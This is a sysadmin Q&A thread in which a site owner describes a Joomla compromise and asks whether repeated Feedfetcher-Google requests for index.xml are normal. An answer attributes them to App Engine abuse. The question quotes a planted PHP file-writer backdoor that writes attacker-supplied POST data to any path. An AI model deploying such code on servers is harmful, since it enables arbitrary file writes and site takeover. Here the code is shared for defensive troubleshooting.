0

My server was recently been compromised due to Joomla and allow_url_fopen = ON I see various php files on my server root having this content in them 

Restricted accoss
<?php
error_reporting(0); 
ini_set("max_execution_time",0); 
ini_set("default_socket_timeout", 2); 
ob_implicit_flush (1); 
$file = "".$_POST["path"];
$fh = fopen ($file, 'w') or die("");
echo fwrite ($fh, stripslashes($_POST["raw_data"]));
fclose($fh);

so I close allow_url_fopen and delete all of these files. Now, my site is running fine for few minutes but it make requests for every few seconds to this address with giving this message in error_log

[Thu Mar 07 00:14:00 2013] [error] [client 74.125.185.16] File does not exist: /var/www/html/index.xml

This I see in access_log lots of time

74.125.179.86 - - [07/Mar/2013:00:15:39 +0000] "GET /index.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+google.com/feedfetcher.html)";

So is it normal?

Assad Ullah
  • 103
  • 4

1 Answers1

3

Looks like someone's abusing Google App Engine. Check your Apache access log for that IP address, and the user agent string should have their app ID. You can then report the abuse to Google.

Michael Hampton
  • 244,070
  • 43
  • 506
  • 972
  • I see this in access_log lots of time but I didn't see any app ID in it: 74.125.179.86 - - [07/Mar/2013:00:15:39 +0000] "GET /index.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)" – Assad Ullah Mar 07 '13 at 01:59
  • That should be added to your question, not posted as a comment. – Michael Hampton Mar 07 '13 at 09:58